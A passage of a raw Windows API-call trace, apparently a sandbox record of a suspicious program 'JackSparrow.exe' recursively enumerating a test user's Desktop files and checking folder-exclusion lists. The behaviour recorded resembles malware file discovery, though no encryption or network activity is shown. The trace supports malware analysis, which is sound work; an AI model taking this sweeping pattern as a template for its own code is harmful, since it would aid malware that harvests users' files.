wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0028.951] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0028.951] FindNextFileW (in: hFindFile=0x7c2080, lpFindFileData=0x6ae4c8 | out: lpFindFileData=0x6ae4c8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9e153a0, ftLastAccessTime.dwHighDateTime=0x1d5e3d9, ftLastWriteTime.dwLowDateTime=0x9e153a0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6ae794, dwReserved1=0x777648, cFileName="Desktop", cAlternateFileName="")) returned 1 [0028.951] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0028.951] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0028.951] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0028.951] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0028.951] PeekMessageW (in: lpMsg=0x6ae674, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae674) returned 0 [0028.952] PeekMessageW (in: lpMsg=0x6ae674, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae674) returned 0 [0028.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop", cchCount1=7, lpString2="AppData", cchCount2=7) returned 3 [0028.952] PeekMessageW (in: lpMsg=0x6ae674, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae674) returned 0 [0028.952] PeekMessageW (in: lpMsg=0x6ae674, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae674) returned 0 [0028.952] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0028.952] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0028.952] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.952] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", lpFindFileData=0x6ae288 | out: lpFindFileData=0x6ae288*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9e153a0, ftLastAccessTime.dwHighDateTime=0x1d5e3d9, ftLastWriteTime.dwLowDateTime=0x9e153a0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName=".", cAlternateFileName="")) returned 0x7c2140 [0028.952] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae288 | out: lpFindFileData=0x6ae288*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9e153a0, ftLastAccessTime.dwHighDateTime=0x1d5e3d9, ftLastWriteTime.dwLowDateTime=0x9e153a0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="..", cAlternateFileName="")) returned 1 [0028.952] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae288 | out: lpFindFileData=0x6ae288*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d8b660, ftCreationTime.dwHighDateTime=0x1d5b7e5, ftLastAccessTime.dwLowDateTime=0x65c8b140, ftLastAccessTime.dwHighDateTime=0x1d5c48a, ftLastWriteTime.dwLowDateTime=0x65c8b140, ftLastWriteTime.dwHighDateTime=0x1d5c48a, nFileSizeHigh=0x0, nFileSizeLow=0x8fe2, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="1ijelx2uuwgwpQu0c7o2.wav", cAlternateFileName="1IJELX~1.WAV")) returned 1 [0028.952] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.952] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.952] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.952] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.952] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.952] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.952] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.952] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.952] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.952] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f8e0440, ftCreationTime.dwHighDateTime=0x1d5befa, ftLastAccessTime.dwLowDateTime=0x5a88f350, ftLastAccessTime.dwHighDateTime=0x1d5b9ed, ftLastWriteTime.dwLowDateTime=0x5a88f350, ftLastWriteTime.dwHighDateTime=0x1d5b9ed, nFileSizeHigh=0x0, nFileSizeLow=0x14d27, dwReserved0=0x770000, dwReserved1=0x777648, cFileName="32U39klehZ.wav", cAlternateFileName="32U39K~1.WAV")) returned 1 [0028.952] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.952] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.952] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.953] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.953] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.953] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.953] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb00416f0, ftCreationTime.dwHighDateTime=0x1d5c1bf, ftLastAccessTime.dwLowDateTime=0x337bc90, ftLastAccessTime.dwHighDateTime=0x1d5b870, ftLastWriteTime.dwLowDateTime=0x337bc90, ftLastWriteTime.dwHighDateTime=0x1d5b870, nFileSizeHigh=0x0, nFileSizeLow=0x5df2, dwReserved0=0x10, dwReserved1=0x777648, cFileName="8IMSMp9nDKOk.odt", cAlternateFileName="8IMSMP~1.ODT")) returned 1 [0028.953] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.953] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.953] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe85b3c70, ftCreationTime.dwHighDateTime=0x1d5b960, ftLastAccessTime.dwLowDateTime=0x5e69cf20, ftLastAccessTime.dwHighDateTime=0x1d5c010, ftLastWriteTime.dwLowDateTime=0x5e69cf20, ftLastWriteTime.dwHighDateTime=0x1d5c010, nFileSizeHigh=0x0, nFileSizeLow=0xdc85, dwReserved0=0x770000, dwReserved1=0x777648, cFileName="aEGTPtS7bD.avi", cAlternateFileName="AEGTPT~1.AVI")) returned 1 [0028.953] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea155690, ftCreationTime.dwHighDateTime=0x1d5bf55, ftLastAccessTime.dwLowDateTime=0x647f3060, ftLastAccessTime.dwHighDateTime=0x1d5babd, ftLastWriteTime.dwLowDateTime=0x647f3060, ftLastWriteTime.dwHighDateTime=0x1d5babd, nFileSizeHigh=0x0, nFileSizeLow=0x64b5, dwReserved0=0x10, dwReserved1=0x777648, cFileName="aOaIGEPyFbLNzs8iTQgh.m4a", cAlternateFileName="AOAIGE~1.M4A")) returned 1 [0028.953] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa9391a0, ftCreationTime.dwHighDateTime=0x1d5be95, ftLastAccessTime.dwLowDateTime=0xad969250, ftLastAccessTime.dwHighDateTime=0x1d5bb7d, ftLastWriteTime.dwLowDateTime=0xad969250, ftLastWriteTime.dwHighDateTime=0x1d5bb7d, nFileSizeHigh=0x0, nFileSizeLow=0x6546, dwReserved0=0x770000, dwReserved1=0x777648, cFileName="AUOmEUF.ppt", cAlternateFileName="")) returned 1 [0028.953] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92a2ad60, ftCreationTime.dwHighDateTime=0x1d5c4e4, ftLastAccessTime.dwLowDateTime=0x28b50320, ftLastAccessTime.dwHighDateTime=0x1d5bf09, ftLastWriteTime.dwLowDateTime=0x28b50320, ftLastWriteTime.dwHighDateTime=0x1d5bf09, nFileSizeHigh=0x0, nFileSizeLow=0x1092e, dwReserved0=0x10, dwReserved1=0x777648, cFileName="Bn6B0LdLyx0L0Guv_ Y.m4a", cAlternateFileName="BN6B0L~1.M4A")) returned 1 [0028.953] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x10, dwReserved1=0x777648, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0028.953] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7827100, ftCreationTime.dwHighDateTime=0x1d5b6e1, ftLastAccessTime.dwLowDateTime=0x6e9dfc40, ftLastAccessTime.dwHighDateTime=0x1d5b999, ftLastWriteTime.dwLowDateTime=0x6e9dfc40, ftLastWriteTime.dwHighDateTime=0x1d5b999, nFileSizeHigh=0x0, nFileSizeLow=0xf8a1, dwReserved0=0x10, dwReserved1=0x777648, cFileName="hnSU4W.mkv", cAlternateFileName="")) returned 1 [0028.953] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe95e00, ftCreationTime.dwHighDateTime=0x1d5e3d9, ftLastAccessTime.dwLowDateTime=0x181f480, ftLastAccessTime.dwHighDateTime=0x1d5e3d9, ftLastWriteTime.dwLowDateTime=0xffb83100, ftLastWriteTime.dwHighDateTime=0x1d5e3d8, nFileSizeHigh=0x0, nFileSizeLow=0xdc800, dwReserved0=0x10, dwReserved1=0x777648, cFileName="JackSparrow.exe", cAlternateFileName="JACKSP~1.EXE")) returned 1 [0028.953] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2567f450, ftCreationTime.dwHighDateTime=0x1d5c2d5, ftLastAccessTime.dwLowDateTime=0x79b8e770, ftLastAccessTime.dwHighDateTime=0x1d5c0f1, ftLastWriteTime.dwLowDateTime=0x79b8e770, ftLastWriteTime.dwHighDateTime=0x1d5c0f1, nFileSizeHigh=0x0, nFileSizeLow=0x93d, dwReserved0=0x10, dwReserved1=0x777648, cFileName="kTcOKA 7x2tvUoVBP6.mp4", cAlternateFileName="KTCOKA~1.MP4")) returned 1 [0028.955] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5742c440, ftCreationTime.dwHighDateTime=0x1d5c5ba, ftLastAccessTime.dwLowDateTime=0xe91d5530, ftLastAccessTime.dwHighDateTime=0x1d5c009, ftLastWriteTime.dwLowDateTime=0xe91d5530, ftLastWriteTime.dwHighDateTime=0x1d5c009, nFileSizeHigh=0x0, nFileSizeLow=0xeb65, dwReserved0=0x10, dwReserved1=0x777648, cFileName="kYfCsY7fw675g46j6.wav", cAlternateFileName="KYFCSY~1.WAV")) returned 1 [0028.955] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9f2c09f0, ftCreationTime.dwHighDateTime=0x1d5c2aa, ftLastAccessTime.dwLowDateTime=0x22fc7280, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0x22fc7280, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x1245, dwReserved0=0x10, dwReserved1=0x777648, cFileName="Nhz507zeCNmw5OeL.jpg", cAlternateFileName="NHZ507~1.JPG")) returned 1 [0028.955] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2450f20, ftCreationTime.dwHighDateTime=0x1d5bbdf, ftLastAccessTime.dwLowDateTime=0x7e0c1db0, ftLastAccessTime.dwHighDateTime=0x1d5c12d, ftLastWriteTime.dwLowDateTime=0x7e0c1db0, ftLastWriteTime.dwHighDateTime=0x1d5c12d, nFileSizeHigh=0x0, nFileSizeLow=0x9dab, dwReserved0=0x10, dwReserved1=0x777648, cFileName="NXpTuweJZ.mp3", cAlternateFileName="NXPTUW~1.MP3")) returned 1 [0028.955] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed4c6800, ftCreationTime.dwHighDateTime=0x1d5c2be, ftLastAccessTime.dwLowDateTime=0x43841660, ftLastAccessTime.dwHighDateTime=0x1d5c516, ftLastWriteTime.dwLowDateTime=0x43841660, ftLastWriteTime.dwHighDateTime=0x1d5c516, nFileSizeHigh=0x0, nFileSizeLow=0x2639, dwReserved0=0x10, dwReserved1=0x777648, cFileName="ORvAJyb.ots", cAlternateFileName="")) returned 1 [0028.955] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8276fa90, ftCreationTime.dwHighDateTime=0x1d5bada, ftLastAccessTime.dwLowDateTime=0x58a2bd00, ftLastAccessTime.dwHighDateTime=0x1d5ba83, ftLastWriteTime.dwLowDateTime=0x58a2bd00, ftLastWriteTime.dwHighDateTime=0x1d5ba83, nFileSizeHigh=0x0, nFileSizeLow=0x140b1, dwReserved0=0x10, dwReserved1=0x777648, cFileName="pRtMXaA65Jvr0xt.mkv", cAlternateFileName="PRTMXA~1.MKV")) returned 1 [0028.955] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0c881f0, ftCreationTime.dwHighDateTime=0x1d5c219, ftLastAccessTime.dwLowDateTime=0x909c3920, ftLastAccessTime.dwHighDateTime=0x1d5be0c, ftLastWriteTime.dwLowDateTime=0x909c3920, ftLastWriteTime.dwHighDateTime=0x1d5be0c, nFileSizeHigh=0x0, nFileSizeLow=0xbbad, dwReserved0=0x10, dwReserved1=0x777648, cFileName="T2TLwD.rtf", cAlternateFileName="")) returned 1 [0028.956] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f6c11b0, ftCreationTime.dwHighDateTime=0x1d5c0d9, ftLastAccessTime.dwLowDateTime=0xdf97b070, ftLastAccessTime.dwHighDateTime=0x1d5c46c, ftLastWriteTime.dwLowDateTime=0xdf97b070, ftLastWriteTime.dwHighDateTime=0x1d5c46c, nFileSizeHigh=0x0, nFileSizeLow=0x165c8, dwReserved0=0x10, dwReserved1=0x777648, cFileName="TLkm8G.mp3", cAlternateFileName="")) returned 1 [0028.956] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x942ddf00, ftCreationTime.dwHighDateTime=0x1d5c0b7, ftLastAccessTime.dwLowDateTime=0xa94942a0, ftLastAccessTime.dwHighDateTime=0x1d5c40c, ftLastWriteTime.dwLowDateTime=0xa94942a0, ftLastWriteTime.dwHighDateTime=0x1d5c40c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x10, dwReserved1=0x777648, cFileName="tPM9533uYXhl8C6vtf", cAlternateFileName="TPM953~1")) returned 1 [0028.956] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0028.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tPM9533uYXhl8C6vtf", cchCount1=18, lpString2="AppData", cchCount2=7) returned 3 [0028.956] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0028.956] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\*", lpFindFileData=0x6ae030 | out: lpFindFileData=0x6ae030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x942ddf00, ftCreationTime.dwHighDateTime=0x1d5c0b7, ftLastAccessTime.dwLowDateTime=0xa94942a0, ftLastAccessTime.dwHighDateTime=0x1d5c40c, ftLastWriteTime.dwLowDateTime=0xa94942a0, ftLastWriteTime.dwHighDateTime=0x1d5c40c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName=".", cAlternateFileName="")) returned 0x7c2200 [0028.956] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae030 | out: lpFindFileData=0x6ae030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x942ddf00, ftCreationTime.dwHighDateTime=0x1d5c0b7, ftLastAccessTime.dwLowDateTime=0xa94942a0, ftLastAccessTime.dwHighDateTime=0x1d5c40c, ftLastWriteTime.dwLowDateTime=0xa94942a0, ftLastWriteTime.dwHighDateTime=0x1d5c40c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="..", cAlternateFileName="")) returned 1 [0028.956] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae030 | out: lpFindFileData=0x6ae030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x61becf80, ftCreationTime.dwHighDateTime=0x1d5b5e9, ftLastAccessTime.dwLowDateTime=0x22bd3bc0, ftLastAccessTime.dwHighDateTime=0x1d5c28a, ftLastWriteTime.dwLowDateTime=0x22bd3bc0, ftLastWriteTime.dwHighDateTime=0x1d5c28a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="ClVeU", cAlternateFileName="")) returned 1 [0028.956] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0028.956] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\*", lpFindFileData=0x6addd8 | out: lpFindFileData=0x6addd8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x61becf80, ftCreationTime.dwHighDateTime=0x1d5b5e9, ftLastAccessTime.dwLowDateTime=0x22bd3bc0, ftLastAccessTime.dwHighDateTime=0x1d5c28a, ftLastWriteTime.dwLowDateTime=0x22bd3bc0, ftLastWriteTime.dwHighDateTime=0x1d5c28a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x777648, cFileName=".", cAlternateFileName="")) returned 0x7c22c0 [0028.956] FindNextFileW (in: hFindFile=0x7c22c0, lpFindFileData=0x6addd8 | out: lpFindFileData=0x6addd8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x61becf80, ftCreationTime.dwHighDateTime=0x1d5b5e9, ftLastAccessTime.dwLowDateTime=0x22bd3bc0, ftLastAccessTime.dwHighDateTime=0x1d5c28a, ftLastWriteTime.dwLowDateTime=0x22bd3bc0, ftLastWriteTime.dwHighDateTime=0x1d5c28a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x777648, cFileName="..", cAlternateFileName="")) returned 1 [0028.956] FindNextFileW (in: hFindFile=0x7c22c0, lpFindFileData=0x6addd8 | out: lpFindFileData=0x6addd8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3f51b0, ftCreationTime.dwHighDateTime=0x1d5bfc8, ftLastAccessTime.dwLowDateTime=0x418c8390, ftLastAccessTime.dwHighDateTime=0x1d5b659, ftLastWriteTime.dwLowDateTime=0x418c8390, ftLastWriteTime.dwHighDateTime=0x1d5b659, nFileSizeHigh=0x0, nFileSizeLow=0x3119, dwReserved0=0x0, dwReserved1=0x777648, cFileName="0CZNNBZljlBQ.pptx", cAlternateFileName="0CZNNB~1.PPT")) returned 1 [0028.956] FindNextFileW (in: hFindFile=0x7c22c0, lpFindFileData=0x6addc0 | out: lpFindFileData=0x6addc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb93c3970, ftCreationTime.dwHighDateTime=0x1d5c366, ftLastAccessTime.dwLowDateTime=0xe2c02960, ftLastAccessTime.dwHighDateTime=0x1d5beb5, ftLastWriteTime.dwLowDateTime=0xe2c02960, ftLastWriteTime.dwHighDateTime=0x1d5beb5, nFileSizeHigh=0x0, nFileSizeLow=0x4857, dwReserved0=0x10, dwReserved1=0x777648, cFileName="AtELWG4 7FDtQ.swf", cAlternateFileName="ATELWG~1.SWF")) returned 1 [0028.957] FindNextFileW (in: hFindFile=0x7c22c0, lpFindFileData=0x6addc0 | out: lpFindFileData=0x6addc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x162ba4e0, ftCreationTime.dwHighDateTime=0x1d5ba1b, ftLastAccessTime.dwLowDateTime=0x23f0900, ftLastAccessTime.dwHighDateTime=0x1d5c316, ftLastWriteTime.dwLowDateTime=0x23f0900, ftLastWriteTime.dwHighDateTime=0x1d5c316, nFileSizeHigh=0x0, nFileSizeLow=0xbf70, dwReserved0=0x10, dwReserved1=0x777648, cFileName="hGD17PyT.gif", cAlternateFileName="")) returned 1 [0028.957] FindNextFileW (in: hFindFile=0x7c22c0, lpFindFileData=0x6addc0 | out: lpFindFileData=0x6addc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c499ca0, ftCreationTime.dwHighDateTime=0x1d5c5db, ftLastAccessTime.dwLowDateTime=0x1b6ea610, ftLastAccessTime.dwHighDateTime=0x1d5c16d, ftLastWriteTime.dwLowDateTime=0x1b6ea610, ftLastWriteTime.dwHighDateTime=0x1d5c16d, nFileSizeHigh=0x0, nFileSizeLow=0x121b4, dwReserved0=0x10, dwReserved1=0x777648, cFileName="mq1QQyNAiW1I2BdfJ.bmp", cAlternateFileName="MQ1QQY~1.BMP")) returned 1 [0028.957] FindNextFileW (in: hFindFile=0x7c22c0, lpFindFileData=0x6addc0 | out: lpFindFileData=0x6addc0*(dwFileAttributes=0x16a004a, ftCreationTime.dwLowDateTime=0x36b45e, ftCreationTime.dwHighDateTime=0x6cf858, ftLastAccessTime.dwLowDateTime=0x77391ecd, ftLastAccessTime.dwHighDateTime=0x74852d, ftLastWriteTime.dwLowDateTime=0x17, ftLastWriteTime.dwHighDateTime=0x160004b, nFileSizeHigh=0x36b45e, nFileSizeLow=0x7c5a78, dwReserved0=0x10, dwReserved1=0x777648, cFileName="mq\x08", cAlternateFileName="Ἀ{jဓĩ\x10")) returned 0 [0028.957] FindClose (in: hFindFile=0x7c22c0 | out: hFindFile=0x7c22c0) returned 1 [0028.957] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf602e3f0, ftCreationTime.dwHighDateTime=0x1d5c1df, ftLastAccessTime.dwLowDateTime=0x4adcad20, ftLastAccessTime.dwHighDateTime=0x1d5bb7d, ftLastWriteTime.dwLowDateTime=0x4adcad20, ftLastWriteTime.dwHighDateTime=0x1d5bb7d, nFileSizeHigh=0x0, nFileSizeLow=0x3153, dwReserved0=0x77744c, dwReserved1=0x777648, cFileName="DQ5aP.png", cAlternateFileName="")) returned 1 [0028.957] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca047e90, ftCreationTime.dwHighDateTime=0x1d5bec3, ftLastAccessTime.dwLowDateTime=0xa4c0b630, ftLastAccessTime.dwHighDateTime=0x1d5b838, ftLastWriteTime.dwLowDateTime=0xa4c0b630, ftLastWriteTime.dwHighDateTime=0x1d5b838, nFileSizeHigh=0x0, nFileSizeLow=0x15b28, dwReserved0=0x10, dwReserved1=0x777648, cFileName="seoYHLX7CEV1iLpfdx.avi", cAlternateFileName="SEOYHL~1.AVI")) returned 1 [0028.958] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9a99f50, ftCreationTime.dwHighDateTime=0x1d5c0e3, ftLastAccessTime.dwLowDateTime=0x2eacd810, ftLastAccessTime.dwHighDateTime=0x1d5c04a, ftLastWriteTime.dwLowDateTime=0x2eacd810, ftLastWriteTime.dwHighDateTime=0x1d5c04a, nFileSizeHigh=0x0, nFileSizeLow=0x0, 